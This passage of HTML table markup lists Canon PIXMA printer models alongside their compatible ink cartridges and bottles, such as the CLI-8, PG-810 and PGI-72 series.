width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td 